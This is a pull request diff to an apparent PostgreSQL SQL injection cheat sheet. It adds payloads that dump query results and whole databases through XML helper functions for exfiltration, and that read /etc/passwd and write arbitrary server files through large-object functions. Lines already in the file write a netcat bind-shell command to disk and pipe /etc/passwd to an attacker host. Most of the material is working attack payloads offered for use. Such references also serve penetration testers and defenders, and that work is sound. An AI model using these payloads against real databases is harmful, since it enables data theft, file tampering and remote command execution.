### PR TITLE
Added Postgres SQLi information on xml helpers and file read/write

### DIFF
--- a/SQL Injection/PostgreSQL Injection.md
+++ b/SQL Injection/PostgreSQL Injection.md
@@ -151,7 +151,7 @@ select pg_ls_dir('./');
 select pg_read_file('PG_VERSION', 0, 200);
 ```
 
-NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer version (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or user's in the `default_role_read_server_files` group.
+NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group.
 
 ```sql
 CREATE TABLE temp(t TEXT);

--- a/SQL Injection/PostgreSQL Injection.md
+++ b/SQL Injection/PostgreSQL Injection.md
@@ -14,6 +14,7 @@
 * [PostgreSQL List tables](#postgresql-list-tables)
 * [PostgreSQL List columns](#postgresql-list-columns)
 * [PostgreSQL Error Based](#postgresql-error-based)
+* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
 * [PostgreSQL Blind](#postgresql-blind)
 * [PostgreSQL Time Based](#postgresql-time-based)
 * [PostgreSQL Stacked query](#postgresql-stacked-query)
@@ -106,6 +107,21 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
 ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
 ```
 
+## PostgreSQL XML helpers
+
+```sql
+select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
+```
+
+The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
+
+```sql
+select database_to_xml(true,true,''); -- dump the current database to XML
+select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
+```
+
+Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
+
 ## PostgreSQL Blind
 
 ```sql
@@ -135,12 +151,18 @@ select pg_ls_dir('./');
 select pg_read_file('PG_VERSION', 0, 200);
 ```
 
-NOTE: ``pg_read_file` doesn't accept the `/` character.
+NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer version (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or user's in the `default_role_read_server_files` group.
 
 ```sql
 CREATE TABLE temp(t TEXT);
 COPY temp FROM '/etc/passwd';
 SELECT * FROM temp limit 1 offset 0;
+```
+
+```sql
+SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID
+SELECT lo_get(16420); -- use the OID returned from the above
+SELECT * from pg_largeobject; -- or just get all the large objects and their data
 ```
 
 ## PostgreSQL File Write
@@ -150,6 +172,12 @@ CREATE TABLE pentestlab (t TEXT);
 INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash');
 SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
+```
+
+```sql
+SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
+SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20
+SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
 ```
 
 ## PostgreSQL Command execution
@@ -181,3 +209,4 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
 * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
 * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
 * [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution)
+* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli)


### PR DESCRIPTION
These changes add additional information into the Postgres SQLi page. Info on how to read/write files using large objects (getting around the need to be able to `CREATE` or `INSERT`), some extra info on how modern postgres behaves with `pg_read_file` and some additional information on using built in XML helpers for data exfil.